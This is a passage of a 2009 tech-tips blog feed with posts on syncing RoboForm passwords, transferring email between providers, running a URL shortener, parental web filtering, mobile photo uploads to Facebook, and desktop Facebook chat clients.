+0000</pubDate><atom:updated>2009-09-15T19:06:22.955-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Computer</category><title>Sync Your Passwords Across All Computers with RoboForm</title><description>&lt;a title="Sync Passwords" href="http://www.labnol.org/?tag=password,sync"&gt;Password manager&lt;/a&gt; programs are a boon for users who have multiple logins at various sites and are smart enough to not use the same common password across all these different sites. &lt;p&gt;You can easily choose a very strong and complex password for that online banking site without having to remember it since the password manager will autofill the login form with the password whenever you visit the bank’s website.&lt;/p&gt; &lt;p&gt;&lt;strong&gt;Synchronize to Access Your Passwords from other Computers&lt;/strong&gt;&lt;/p&gt; &lt;p&gt;One of the most popular password managers around is &lt;a href="http://www.roboform.com/" target="_blank"&gt;AI RoboForm&lt;/a&gt; that stores all your saved logins &amp;amp; passwords as .rfp files on the local hard drive encrypted using the &lt;a href="http://en.wikipedia.org/wiki/Advanced_Encryption_Standard"&gt;128-bit AES&lt;/a&gt; standard. In simple English, decrypting such files is considered out of the realm of possibility for all known computing facilities.&lt;/p&gt; &lt;p&gt;&lt;img title="Sync RoboForm passcards" alt="Sync RoboForm passcards" src="http://img.labnol.org/di/2009/09/goodsync.png" width="426" height="325" /&gt;&lt;/p&gt; &lt;p&gt;If your work involves multiple computers, you’ll be happy to know that RoboForm software offers couple of good choices for password synchronization across computers.&lt;/p&gt; &lt;p&gt;You can either create a free online account at &lt;a href="https://online.roboform.com/signup" target="_blank"&gt;roboform.com&lt;/a&gt; and synchronize your passwords across multiple computers using the cloud (RoboForm servers) or, if you want to stay in control of your data, you can put the RoboForm data to a separate location (like another folder on the same computer or a removable flash drive) and then synchronize these locations with other computers using tools like &lt;a href="http://www.labnol.org/internet/compare-windows-live-sync-mesh-and-skydrive/6166/"&gt;Live Mesh or Live Sync&lt;/a&gt;.&lt;/p&gt; &lt;p&gt;To get started, just install &lt;a href="http://www.goodsync.com/" target="_blank"&gt;Goodsync&lt;/a&gt; and then from your RoboForm Options, choose the Change Sync Settings option under User Data. Enter the details of your RoboForm Online account or select a USB drive, a folder on another network-connected computer or another folder on the same computer.&lt;/p&gt; &lt;p&gt;In addition to the cloud, you may also save RoboForm passwords to your &lt;a href="http://www.labnol.org/internet/tools/amazon-s3-buckets-tutorial/3890/"&gt;Amazon S3 buckets&lt;/a&gt; or an FTP server. At the time of writing, both modes of synchronization were not simultaneously available.&lt;/p&gt; &lt;p&gt;The synchronization of passwords will happen automatically when RoboForm saves a password file or when you enter the Master Password or you can manually instruct RoboForm to "Sync RoboForm Data".&lt;/p&gt; &lt;p&gt;&lt;img title="passwords on amazon s3" alt="passwords on amazon s3" src="http://img.labnol.org/di/2009/09/s3.png" width="428" height="482" /&gt;&lt;/p&gt; &lt;p&gt;&lt;strong&gt;Access Saved Passwords without RoboForm&lt;/strong&gt;&lt;/p&gt; &lt;p&gt;Once your logins and passwords are saved onto your RoboForm Online account, you can retrieve this information on any computer using a web browser.&lt;/p&gt; &lt;p&gt;If that computer has RoboForm installed, the software can automatically log you into any of the saved websites. However, if the computer doesn’t have RoboForm installed, you’ll still be able to view the login and password information of any saved website and you can then manually copy-paste the credentials into the online form without too much of a hassle.&lt;/p&gt; &lt;p&gt;&lt;strong&gt;Alternatives to RoboForm for Password Synchronization&lt;/strong&gt;&lt;/p&gt; &lt;p&gt;RoboForm is officially available for Internet Explorer, Firefox, BlackBerry and Windows Mobile but it won’t work if you are using Opera or a Webkit based browser like Google Chrome or Apple’s Safari. &lt;/p&gt; &lt;p&gt;In that case, you may either use &lt;a href="https://lastpass.com/" target="_blank"&gt;LastPass&lt;/a&gt; (available for Windows/Mac/Linux and support most browsers except Opera) or download &lt;a href="http://keepass.info/" target="_blank"&gt;KeePass&lt;/a&gt; password manager and sync password information across computers using Windows Live Mesh. Unlike LastPass or RoboForm, KeePass won’t fill forms for your automatically. &lt;/p&gt; &lt;p&gt;&lt;strong&gt;Are your passwords safe online?&lt;/strong&gt;&lt;/p&gt; &lt;p&gt;Your passwords files, stored on the RoboForm Online servers, are encrypted  with your Master Password as the key. RoboForm says that "since your Master Password is not stored on our servers, absolutely nobody, including Siber Systems, can access your passwords or other RoboForm data."&lt;/p&gt; &lt;p&gt;And to avoid man-in-the-middle attacks, all communication between your PC and the Roboform servers takes place over Secure Sockets Layer (SSL). Using SSL, which is implemented on both your computer and the Roboform server, the data (password files) you send can be trusted to arrive privately and unaltered to the server you specify and no other.&lt;/p&gt; &lt;p&gt;&lt;strong&gt;Pros &amp;amp; Cons of using RoboForm&lt;/strong&gt;&lt;/p&gt; &lt;p&gt;One can create more complex and difficult passwords, safe in the knowledge that they’re accessible online and from multiple locations. Automatic sync and backup ensures that your login credentials are safe incase your machine suffers a crash. And the option to sync passwords to a USB disk ensures that you can carry your passwords anywhere.&lt;/p&gt; &lt;p&gt;There’s however some risk involved in trusting a third party to host your passcards because, no matter how heavily encrypted a file might be, the entry point is still your Master Password.&lt;/p&gt; &lt;p&gt;Make sure the Master Password is as strong as you can make it – long, random and interspersed with characters, digits and symbols.&lt;/p&gt;</description><link>http://123mycomputer.blogspot.com/2009/09/sync-your-passwords-across-all.html</link><author>noreply@blogger.com (AJEET)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8378401052179741157.post-3808548966643634113</guid><pubDate>Sun, 13 Sep 2009 01:54:00 +0000</pubDate><atom:updated>2009-09-12T18:56:36.790-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Internet</category><title>How to Transfer Mails from one Email Account to another for Freeow to Transfer Mails from one Email Account to another for Free</title><description>&lt;h1&gt;here can be several reasons why you may want to switch email service providers. &lt;/h1&gt;&lt;p&gt;Reason #1. Your existing email address gets too much spam so you plan to dump the old account and switch to a new email address (a form of email bankruptcy).&lt;/p&gt; &lt;p&gt;Reason #2. You are leaving your existing job for higher studies and need to transfer all personal emails from the Microsoft Exchange server to your new university email account.&lt;/p&gt; &lt;p&gt;Reason #3. Your ISP’s email service isn’t reliable and you therefore plan to move to a free web based email service like Gmail, Yahoo Mail, Hotmail, etc.&lt;/p&gt; &lt;p&gt;Reason #4. You think the new email service from XYZ Inc. offers more features than your existing mail provider and hence want to make the move.&lt;/p&gt; &lt;h2&gt;Moving Emails from One Account to Another&lt;/h2&gt; &lt;p&gt;This illustration will help you visualize how to transfer email messages across the three most popular web email services. The transfer will happen online and you just need to specify the credentials (user name &amp;amp; password) of your old email account (from where you want to move message out) and your new email address (where you want to move messages in).&lt;/p&gt; &lt;p&gt;&lt;img title="online email transfer" alt="online email transfer" src="http://img.labnol.org/di/MoveAllYouEmailMessagesfromOneAccounttoA_1054C/onlineemailtransfer.png" width="536" border="0" height="345" /&gt;&lt;/p&gt; &lt;p&gt;&lt;strong&gt;Moving to Windows Live Hotmail&lt;/strong&gt;&lt;/p&gt; &lt;p&gt;Windows Live Hotmail is integrated with &lt;a href="https://secure5.trueswitch.com/winlive/"&gt;TrueSwitch&lt;/a&gt; so you can easily transfer emails from Yahoo Mail, AOL, Gmail, Live.com, .Mac, etc. to your shiny new Hotmail address. The same service may also be used for copying old email from an existing Hotmail account to a new Hotmail address.&lt;/p&gt; &lt;p&gt;&lt;strong&gt;Moving to Yahoo Mail&lt;/strong&gt;&lt;/p&gt; &lt;p&gt;Like Windows Live Hotmail, Yahoo! Mail too provides integration with &lt;a href="https://secure5.trueswitch.com/yahoo/"&gt;TrueSwitch&lt;/a&gt; so you can easy copy mails from Gmail, Hotmail, AOL, Juno, Rocket Mail, etc. into your Yahoo! account. With TrueSwitch, you can also copy mails from one Yahoo! inbox to another without upgrading to Yahoo! Mail Plus.&lt;/p&gt; &lt;p&gt;&lt;strong&gt;Moving to Gmail / Google Apps&lt;/strong&gt;&lt;/p&gt; &lt;p&gt;Gmail (or Google Apps for Email) has a built-in &lt;a href="http://mail.google.com/support/bin/answer.py?answer=21288"&gt;Mail Fetcher&lt;/a&gt; feature that lets you download email messages from 5 different email accounts that support POP access. You may therefore use this feature to move your old Hotmail or AOL messages into Gmail as both these service provide free POP3 access.&lt;/p&gt; &lt;p&gt;The migration from Yahoo! Mail to Gmail is slightly tricky but possible. Keep reading.&lt;/p&gt; &lt;p&gt;&lt;strong&gt;Trick: Move emails from Yahoo Mail to Gmail or Outlook without POP&lt;/strong&gt;&lt;/p&gt; &lt;p&gt;The free account of Yahoo Mail doesn’t provide IMAP or POP3 access so you can’t move these emails into Gmail or a desktop client like Microsoft Outlook.&lt;/p&gt; &lt;p&gt;The Yahoo! Mail Plus upgrade will add POP3 access to you account at $20 per year but if you want to save some money, here’s an alternate but simple trick:&lt;/p&gt; &lt;p&gt;&lt;img style="border-width: 0px; display: inline;" title="move yahoo to gmail or hotmail" alt="move yahoo to gmail or hotmail" src="http://img.labnol.org/di/MoveAllYouEmailMessagesfromOneAccounttoA_1054C/gmailyahoo.png" width="535" border="0" height="166" /&gt;&lt;/p&gt; &lt;p&gt;1. Create a new account at Windows Live Hotmail and fetch all your Yahoo! mails into this account using the free &lt;a href="https://secure5.trueswitch.com/winlive/"&gt;TrueSwitch Service&lt;/a&gt;.&lt;/p&gt; &lt;p&gt;2. Now that your mails are inside Hotmail, you can setup POP3 configuration to fetch those Yahoo messages into Gmail via Hotmail.&lt;/p&gt; &lt;p&gt;&lt;strong&gt;Migrating Emails Away from your ISP Account&lt;/strong&gt;&lt;/p&gt; &lt;p&gt;TrueSwitch mentioned above supports all popular ISPs including Comcast, Verizon, CableVision, AT&amp;amp;T, etc. but if your ISP is not in the list and you don’t have the time to configure your email client for POP3 or IMAP access, check out &lt;a href="https://www.yippiemove.com/step/1/"&gt;Yippie Move&lt;/a&gt;.&lt;/p&gt; &lt;p&gt;It’s a online email transfer service similar to TrueSwitch but supports an even larger number of email service providers including the .edu addresses of certain colleges and universities in US. With YippieMove, you can choose folders (or labels in Gmail) that you want to copy to the new location without having to move the entire mailbox. The service is quick and easy but costs around $15 per email account.&lt;/p&gt; &lt;p&gt;&lt;strong&gt;Copying emails from Microsoft Exchange / Outlook&lt;/strong&gt;&lt;/p&gt; &lt;p&gt;Every organization has a different policy with respect to corporate email so check with the administration if your Exchange service offers POP3 or IMAP access – if yes, you can easily transfer messages into any of the free web mail accounts directly as listed above. Also see these guides:&lt;/p&gt; &lt;ul&gt;&lt;li&gt;&lt;a href="http://www.labnol.org/internet/email/export-outlook-email-to-gmail-pst-backup/1938/"&gt;Export Outlook email to your Gmail Account&lt;/a&gt; &lt;/li&gt;&lt;li&gt;&lt;a href="http://www.labnol.org/internet/email/import-outlook-email-gmail-google-mail-uploader/2836/"&gt;Copy Outlook Mail to Google Apps&lt;/a&gt; &lt;/li&gt;&lt;li&gt;&lt;a href="http://www.labnol.org/internet/email/move-emails-from-hotmail-to-gmail-outlook-imap/1951/"&gt;Transfer Mail to Hotmail via Outlook Connector&lt;/a&gt; &lt;/li&gt;&lt;/ul&gt; &lt;p&gt;&lt;strong&gt;Email Transfer Complete? The Next Step&lt;/strong&gt;&lt;/p&gt; &lt;p&gt;Now that all your message have moved to your new email address, you can set up a vacation responder in your old email account to auto-inform contacts about your new email address. Also check this guide on how to &lt;a href="http://www.labnol.org/internet/email/manage-multiple-email-addresses/7991/"&gt;manage multiple email addresses&lt;/a&gt;.&lt;/p&gt;</description><link>http://123mycomputer.blogspot.com/2009/09/how-to-transfer-mails-from-one-email.html</link><author>noreply@blogger.com (AJEET)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8378401052179741157.post-8754345291111494568</guid><pubDate>Sun, 13 Sep 2009 01:51:00 +0000</pubDate><atom:updated>2009-09-12T18:53:21.306-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Internet</category><title>Setup Your Own TinyURL Like Redirection Service in 2 Minutes</title><description>URL shortening services like TinyURL, bit.ly, etc. provide &lt;a href="http://labnol.blogspot.com/2007/04/convert-long-complicated-web-addresses.html"&gt;small aliases&lt;/a&gt; for long web addresses thus making it easier for you to share complex links through email, IM, Twitter, etc. &lt;p&gt;The only problem with URL shortening services is that most of them don’t have a solid business model yet so if they decide to shut shop in future, all your existing short links will become broken or point to non-existent 404 pages.&lt;/p&gt; &lt;p&gt;To prevent yourself from running into such a situation, you can consider setting up your own URL shortening service that will run on your own domain (or web server) and the short URLs will therefore resolve throughout the lifespan of your site.&lt;/p&gt; &lt;h2&gt;Google Short URLs Service for Google Apps&lt;/h2&gt; &lt;p&gt;Google provides an excellent URL shortening service but it’s only available for sites that use Google Apps for Domains. Other than providing memorable shortcuts to web URLs, Google Short Links service also offers standard analytics so you can know the usage level (or click-throughs) of individual URLs.&lt;/p&gt; &lt;p&gt;Here’s are some sample URLs that internally use the Google URL shortening service:&lt;/p&gt; &lt;ul&gt;&lt;li&gt;&lt;a href="http://go.labnol.org/facebook" rel="nofollow"&gt;go.labnol.org/facebook&lt;/a&gt; – Digital Inspiration on Facebook &lt;/li&gt;&lt;li&gt;&lt;a href="http://go.labnol.org/camera-phones" rel="nofollow"&gt;go.labnol.org/camera-phones&lt;/a&gt; – Uses of Camera Phones &lt;/li&gt;&lt;/ul&gt; &lt;p&gt;To get started, add the &lt;a href="http://www.google.com/enterprise/marketplace/viewListing?productListingId=5143210+6352879591152674960"&gt;Google Short Links&lt;/a&gt; service to your Google Apps domain. By default your redirection service will be available at links.example.com but you are free to choose any other sub-domain for this purpose. From the dashboard, open your Short Links settings and add a new URL (I picked go.labnol.org) and then deleted the default links sub-domain.&lt;/p&gt; &lt;p&gt;&lt;img title="cname settings" alt="cname settings" src="http://img.labnol.org/di/GoogleURLShorteningServiceforGoogleAppsD_AEBC/cname.png" width="193" align="right" border="0" height="77" /&gt; Next open your web domains cpanel and create a new CNAME record for the same sub-domain that should point to ghs.google.com as in the following screenshot.&lt;/p&gt; &lt;p&gt;Wait for a couple of minutes for the DNS changes to propagate across the Internet and your TinyURL clone is ready to serve. Here’s the default web interface where you can create short URLs using your Google Apps account.&lt;/p&gt; &lt;p&gt;&lt;strong&gt;Screenshot: Create your own short URLs&lt;/strong&gt;&lt;/p&gt; &lt;p&gt;&lt;img style="border-width: 0px; display: inline;" title="google short urls interface" alt="google short urls interface" src="http://img.labnol.org/di/GoogleURLShorteningServiceforGoogleAppsD_AEBC/googleshorturls.png" width="534" border="0" height="129" /&gt;&lt;/p&gt; &lt;p&gt;You can either create custom aliases or let the Google App itself choose a short URL for your web address but unlike the TinyURL service that does a &lt;a href="http://www.labnol.org/internet/search/google-should-decode-tinyurl-links-of-twitter/3588/"&gt;301 redirect&lt;/a&gt;, Google Short URLs do a 302 temporary redirect so the link juice, PageRank, etc. aren’t transferred to the original URL.&lt;/p&gt; &lt;p&gt;Tiny URLs created with Google Short Links offer another advantage – you can edit the underlying web page address so the short URLs will stay valid even if the underlying page has moved to a new location.&lt;/p&gt; &lt;p&gt;&lt;strong&gt;Screenshot: See usage count of short URLs&lt;/strong&gt;&lt;/p&gt; &lt;p&gt;&lt;img style="border-width: 0px; display: inline;" title="manage short urls" alt="manage short urls" src="http://img.labnol.org/di/GoogleURLShorteningServiceforGoogleAppsD_AEBC/googleappurls.png" width="534" border="0" height="176" /&gt;&lt;/p&gt; &lt;h2&gt;Run your own URL Shortening Service&lt;/h2&gt; &lt;p&gt;Google Short Links are a perfect match for people who need a TinyURL like redirection service without involving any technical details. You don’t need any web server space and there are no MySQL databases or PHP scripts involved but the only downside it that your site must be running on Google Apps.&lt;/p&gt; &lt;p&gt;If you need to set up redirection on a site that doesn’t use Google Apps, try &lt;a href="http://get-shorty.com/"&gt;Shorty&lt;/a&gt; – it’s a free MySQL + PHP scripts that you may either set on sub-domain or a sub-directory under your main website.&lt;/p&gt; &lt;p&gt;With Shorty, you get a simple web interface to create as well as manage all your existing short URLs. Just upload all the installation files to your Apache server and run _install.php from the web browser. It also provides stats for individual short URLs.&lt;/p&gt;</description><link>http://123mycomputer.blogspot.com/2009/09/setup-your-own-tinyurl-like-redirection.html</link><author>noreply@blogger.com (AJEET)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8378401052179741157.post-6867008683174201673</guid><pubDate>Sun, 13 Sep 2009 01:49:00 +0000</pubDate><atom:updated>2009-09-12T18:51:32.284-07:00</atom:updated><title>How Parents Can Protect Their Kids from Inappropriate Content on the Internet</title><description>&lt;p&gt;The Internet hosts billions of web pages but a large chunk of this material may be inappropriate for your young children. Therefore, let’s explore a couple of easy ways that can possibly help parents prevent kids from viewing the dark side of the world wide web.&lt;/p&gt; &lt;p&gt;You don’t have be a tech-savvy person to implement any of the following stuff on your home computer(s) and all the software tools / services discussed here are available for free via the Internet.&lt;/p&gt; &lt;p&gt;&lt;strong&gt;Block Adult Sites Automatically&lt;/strong&gt;&lt;/p&gt; &lt;p&gt;Since you don’t want kids to accidentally see any of sites that contain adult content, an easy option for blocking such sites is &lt;a title="What is OpenDNS" href="http://www.labnol.org/internet/tools/opendsn-what-is-opendns-why-required-2/2587/"&gt;OpenDNS&lt;/a&gt;.&lt;/p&gt; &lt;p&gt; &lt;object data="http://www.youtube.com/v/I1_trEUTTwI&amp;amp;hl=en&amp;amp;fs=1&amp;amp;rel=0&amp;amp;showinfo=0&amp;amp;fmt=18" type="application/x-shockwave-flash" width="480" height="365"&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;param name="allowscriptaccess" value="always"&gt;&lt;param name="src" value="http://www.youtube.com/v/I1_trEUTTwI&amp;amp;hl=en&amp;amp;fs=1&amp;amp;rel=0&amp;amp;showinfo=0&amp;amp;fmt=18"&gt;&lt;param name="allowfullscreen" value="true"&gt;&lt;/object&gt; &lt;/p&gt;&lt;p&gt;You don’t have to download or install any software – just go to &lt;a href="http://opendns.com/start"&gt;opendns.com/start&lt;/a&gt; in any Internet browser, choose the "Computer" option (let’s keep it simple) and follow the instructions on the screen. Once your computer is configured with OpenDNS, go to Dashboard -&gt; Settings and set the Filtering level to either Moderate or High.&lt;/p&gt; &lt;p&gt;Now whenever your kid mistakenly types a URL of some adult site in the browser (e.g. whitehouse.com instead of whitehouse.gov) or clicks a link that may be pointing to an inappropriate site, the OpenDNS filters will match the address of that site against their own database of adults sites and if there’s a match, the underlying web page won’t be displayed on the child’s computer.&lt;/p&gt; &lt;p&gt;&lt;strong&gt;Prevent clicks on Malicious Sites&lt;/strong&gt;&lt;/p&gt; &lt;p&gt;When you perform a search on Google or other search engines, there is a probability that some of the links appearing on the search results page could be pointing to sites that host malicious or harmful content.&lt;/p&gt; &lt;p&gt;To make sure that your children aren’t clicking these links, what you need is &lt;a href="http://www.mywot.com/"&gt;Web of Trust&lt;/a&gt; – it’s a simple filter that analyzes web page links in the background and adds colored icons next to them so that you child knows whether visiting the underlying site is safe or not.&lt;/p&gt;&lt;p&gt;Web of Trust is available for both Internet Explorer &amp;amp; Firefox. It can scan links appearing on almost every major search engine and even web email services. You can also use the WOT online service to find the reputation rating of any website as in &lt;a href="http://www.mywot.com/en/scorecard/labnol.org"&gt;this example&lt;/a&gt;.&lt;/p&gt; &lt;p&gt;&lt;strong&gt;Block Selected Websites (like IMs or Social sites)&lt;/strong&gt;&lt;/p&gt; &lt;p&gt;The filtering option in OpenDNS is great for blocking an entire category of websites on your computer but if you are looking to block only selected sites (e.g. Orkut.com or MySpace.com) because your kids are too young to waste time on these sites, here’s a tip.&lt;/p&gt; &lt;p&gt;&lt;img style="border-width: 0px; display: inline;" title="hosts file" alt="hosts file" src="http://img.labnol.org/di/hosts.png" width="527" border="0" height="352" /&gt;&lt;/p&gt; &lt;p&gt;Run the &lt;a href="http://download.cnet.com/HostsMan/3000-2381_4-10409169.html"&gt;Hostsman&lt;/a&gt; software (it’s a freeware for Windows) and press Ctrl+O to open the hosts file editor. Click the "Add" icon and type the URLs of all the websites that you want to block on the child’s computer. Hit Save and close the hostsman application.&lt;/p&gt; &lt;p&gt;None of the blocked sites will ever open in any of the browsers installed on your child’s computer unless someone manually deletes the record from the &lt;a href="http://labnol.blogspot.com/2004/10/tweak-your-windows-hosts-file.html"&gt;hosts file&lt;/a&gt;.&lt;/p&gt; &lt;p&gt;&lt;strong&gt;Turn Safe Search On forever&lt;/strong&gt;&lt;/p&gt; &lt;p&gt;Google, Bing, Yahoo and most other search engines allow you to search the web (and images) in "Safe Search" mode meaning you are less likely to encounter images or web pages in search results that may not be appropriate for children.&lt;/p&gt; &lt;p&gt;But &lt;strong&gt;the only problem with this approach&lt;/strong&gt; is that it uses cookies so if you clear the browser cache, the "safe search" preference will be lost as well.&lt;/p&gt; &lt;p&gt;&lt;img style="border-width: 0px; display: inline; margin-left: 0px; margin-right: 0px;" title="keyword_URL" alt="keyword_URL" src="http://img.labnol.org/di/keyword-url.png" width="365" align="right" border="0" height="151" /&gt; Luckily, you can force the "strict filtering" option in your browser even if the parent or the kid forgot to turn that option on himself.&lt;/p&gt; &lt;p&gt;The trick is that you open the Google search URL wherever it appears in the browser database and append "safe=active" before the "q" parameter.&lt;/p&gt; &lt;p&gt;For instance, you can type about:config in Firefox and change the keyword.url value to http://www.google.com/search?safe=active&amp;amp;q= – now any searches performed from the address bar will always show "safe" content.&lt;/p&gt;  &lt;p&gt;&lt;strong&gt;Track Kids Activity on the Computer&lt;/strong&gt;&lt;/p&gt; &lt;p&gt;While I don’t suggest using a keylogger program to monitor each and every word that your kid is typing, you may want to explore programs like &lt;a href="http://www.rescuetime.com/"&gt;Rescue Time&lt;/a&gt; or &lt;a href="http://www.slifelabs.com/"&gt;Slife&lt;/a&gt; as they will give you a good overview of how your kids are spending time at the computer.&lt;/p&gt; &lt;p&gt;You get to know what sites are they visiting, how much time are they spending with IM programs, what software applications are they running more frequently and how much time do they spend on individual sites.&lt;/p&gt; &lt;p&gt;Related: &lt;a title="Keep a Record Of All Things You Do On the Computer" href="http://www.labnol.org/software/organize/record-computer-usage-online-activity/3817/"&gt;Keep a record of all things you do on the computer&lt;/a&gt;&lt;/p&gt;</description><link>http://123mycomputer.blogspot.com/2009/09/how-parents-can-protect-their-kids-from.html</link><author>noreply@blogger.com (AJEET)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8378401052179741157.post-2529495253254617675</guid><pubDate>Sun, 13 Sep 2009 01:46:00 +0000</pubDate><atom:updated>2009-09-12T18:49:26.620-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Internet</category><title>Upload Photos from a Mobile Phone to your Facebook Album</title><description>ou captured a bunch of photos using the camera of your mobile phone – now how do you upload these pictures directly to Facebook without having to transfer them to a desktop computer? &lt;p&gt;There are basically three ways by which you can send photos from a mobile phone to the Facebook website – MMS, Mobile Phone Apps and Email. Let’s look at each of these options one by one.&lt;/p&gt; &lt;p&gt;&lt;strong&gt;Facebook Apps for Mobile&lt;/strong&gt;&lt;/p&gt; &lt;p&gt;If you have a smartphone like the iPhone, BlackBerry, Windows Mobile or Nokia (with Ovi Store), you can visit &lt;a href="http://m.facebook.com/" target="_blank"&gt;m.facebook.com&lt;/a&gt; using the internet browser of your mobile phone and download the Facebook application for your device. These apps will often integrate with the camera function of your phone and provide an option to directly upload pictures to Facebook right after they’ve been taken.&lt;/p&gt; &lt;p&gt;If there’s no official Facebook app available for your mobile platform, you may also check the mobile app at &lt;a href="http://www.shozu.com/portal/selfprovisioning.do?operation=startWizard" target="_blank"&gt;Shozu.com&lt;/a&gt; – Shozu is available for a  large number of mobile phones and allows uploading photos/videos to Facebook in addition to most other social sites.&lt;/p&gt; &lt;p&gt;&lt;strong&gt;Facebook MMS &lt;/strong&gt;&lt;/p&gt; &lt;p&gt;Now if you are not carrying a smartphone but still want to move pictures from the phone to Facebook, you can use picture messaging or MMS. Here’s how it works.&lt;/p&gt; &lt;p&gt;Compose a new MMS message on your mobile phone and attach the image file that you want to post to your Facebook stream with the MSS message. Send that MMS to mobile@facebook.com (email, not phone) and Facebook will send you a confirmation code (via text) to associate your mobile phone number with your Facebook profile.&lt;/p&gt; &lt;p&gt;The MMS option looks like a nice technique for upload photos from old phones but the problem is that it may not always work as expected and secondly, sending MMS messages per picture (depending upon your carrier plan) can sometimes turn out to be an expensive proposition.&lt;/p&gt; &lt;p&gt;&lt;strong&gt;Facebook Email&lt;/strong&gt;&lt;/p&gt; &lt;p&gt;Luckily, there’s another option provided your mobile phone can send email. Go to &lt;a href="http://www.facebook.com/mobile/" target="_blank"&gt;facebook.com/mobile&lt;/a&gt; and note a special "upload" email address that has been assigned to you by Facebook. Any photograph (or video clip) that is sent to this address via email will instantly get posted to your Facebook page.&lt;/p&gt; &lt;p&gt;Much like Flickr, when you send a photo to this "unique" email address, the subject of your email message will be used as the photo caption.  And these photos will get saved in the "Mobile Uploads" photo album of your Facebook account visible to all your Facebook contacts. You can consider changing the privacy settings of your "Mobile Uploads" folder to change the default viewership of photographs upload from a mobile device.&lt;/p&gt; &lt;p&gt;Another tip – the email address assigned by Facebook can be quite long and complex so you may want to save it to your phone address book beforehand for easy access.&lt;/p&gt; &lt;p&gt;&lt;strong&gt;Facebook + Posterous&lt;/strong&gt;&lt;/p&gt; &lt;p&gt;When you send photos to Facebook via the email option, all pictures are published to the "Mobile Uploads" folder by default and unfortunately, there’s no option to change that setting. However, if you want Facebook to create separate photo albums for each of your batch uploads, you can consider using Posterous.&lt;/p&gt; &lt;p&gt;It works like this. First link your Facebook account with Posterous. Then go to your &lt;a href="http://posterous.com/autopost" target="_blank"&gt;Posterous Autopost settings&lt;/a&gt; and set the minimum Facebook gallery size to either 1 or 2. Now when you send an email message to facebook@posterous.com with 2 or more photos, they will be posted to their own albums on Facebook so it becomes more easy for you to manage / sort pictures later.&lt;/p&gt;</description><link>http://123mycomputer.blogspot.com/2009/09/upload-photos-from-mobile-phone-to-your.html</link><author>noreply@blogger.com (AJEET)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8378401052179741157.post-8558994961151395679</guid><pubDate>Sun, 13 Sep 2009 01:45:00 +0000</pubDate><atom:updated>2009-09-12T18:46:34.647-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Internet</category><title>Use Facebook Chat without opening Facebook.com</title><description>acebook includes an awesome chat feature that lets you instantly start conversations with your Facebook buddies without installing any IM software but the only small issue is that you need to be on the Facebook.com website in order to use Facebook chat.&lt;br /&gt;&lt;br /&gt;If you find this a bit inconvenient, here are some good workarounds that will let you chat on Facebook from anywhere without even having to open the Facebook site in your browser.&lt;br /&gt;Facebook Chat Inside the Web Browser&lt;br /&gt;&lt;br /&gt;If you have Google Chrome or Prism for Firefox, you can open this address in your browser address bar and then create an application shortcut to Facebook chat on your desktop.&lt;br /&gt;&lt;br /&gt;Firefox users may bookmark the above link and set the "Load this bookmark in Sidebar" property to true in order to use Facebook chat from the Firefox sidebar.&lt;br /&gt;&lt;br /&gt;If you an IE user or hate to use Facebook chat from the sidebar, try Gabtastik – this is a minimal desktop client for Facebook that looks exactly like the web version of Facebook chat but will also send you notifications of new messages and chat requests from the system tray.&lt;br /&gt;&lt;br /&gt;meebo - facebook chat&lt;br /&gt;&lt;br /&gt;Meebo, the very awesome web based instant messaging service, now supports Facebook chat as well. You can connect your Facebook account with meebo via the Facebook Connect service (so there’s no need to share your Facebook credentials with anyone) and instantly chat with your online buddies inside the web browser.&lt;br /&gt;&lt;br /&gt;There are two advantages here – you can use Facebook chat even if the main Facebook.com site is blocked in your office and two, you can simultaneously connect with friends on other IM networks from the same website.&lt;br /&gt;Facebook Chat Clients for your Desktop&lt;br /&gt;&lt;br /&gt;facebook messenger&lt;br /&gt;&lt;br /&gt;ChitChat – If Facebook were to develop a standalone messenger on the lines of Yahoo! or Google Talk, it might look something like ChitChat.&lt;br /&gt;&lt;br /&gt;ChitChat is a Windows-only desktop client for Facebook that provides a tabbed window to make it easy for you to talk to may friends at once. It will also show notifications in the tray when your friends go online or when they have signed out. The application is in RC stage so expect a few bugs.&lt;br /&gt;&lt;br /&gt;digsby for facebook&lt;br /&gt;&lt;br /&gt;Digsby – This is again a very useful all-in-one app that helps you stay up to date with everything happening on your Facebook, Twitter, Gmail, LinkedIn and other online accounts.&lt;br /&gt;&lt;br /&gt;If you have multiple accounts on Facebook (like you and your spouse), you can associate all of them with your Disgsby messenger and chat with the combined buddy list simultaneously. Facebook doesn’t allow audio or video calls but Digsby indirectly brings that feature to Facebook Chat via tokbox.&lt;br /&gt;&lt;br /&gt;There were reports (1,2,3) that Digsby’s installer can add some crapware to your computer but that should not hold you back as there’s an alternate installer (direct link) that will bypass the non-essential stuff.&lt;br /&gt;&lt;br /&gt;adium on facebookAdium – If you are on Mac, Adium is probably the best choice for you to chat with Facebook friends from the desktop.&lt;br /&gt;&lt;br /&gt;Like Pidgin and Digsby, Adium too supports multiple IM networks, including Windows Live Messenger, Google Talk, AOL AIM, ICQ, Yahoo! Messenger, Skype, Twitter and Jabber (XMPP). And it uses the same Facebook Chat plugin that is available for Pidgin users on Google Code.&lt;br /&gt;&lt;br /&gt;pidgin with facebook chat&lt;br /&gt;&lt;br /&gt;Pidgin – While Facebook Chat is not officially supported in Pidgin, there’s a free plug-in that lets you connect to the Facebook chat server from Pidgin. And like Digsby, Pidgin too would let you chat with buddies on multiple Facebook accounts from the same interface.&lt;br /&gt;&lt;br /&gt;Pidgin vs Digsby – Pidgin is purely for instant messaging while Digsby will also display notifications like when a friends sends you a message using Facebook email or if he or she writes something on your Facebook wall. Some people in the comments say that even Pidgin displays notifications but at least that doesn’t work in Windows 7.&lt;br /&gt;&lt;br /&gt;Pidgin will show all your Facebook contacts in one giant list (see update) while Digsby will group contacts under logical "Friends list" just the way you have them on the main facebook.com site. Update: The new version of Facebook Chat plugin for Pidgin displays your online friends under groups just like 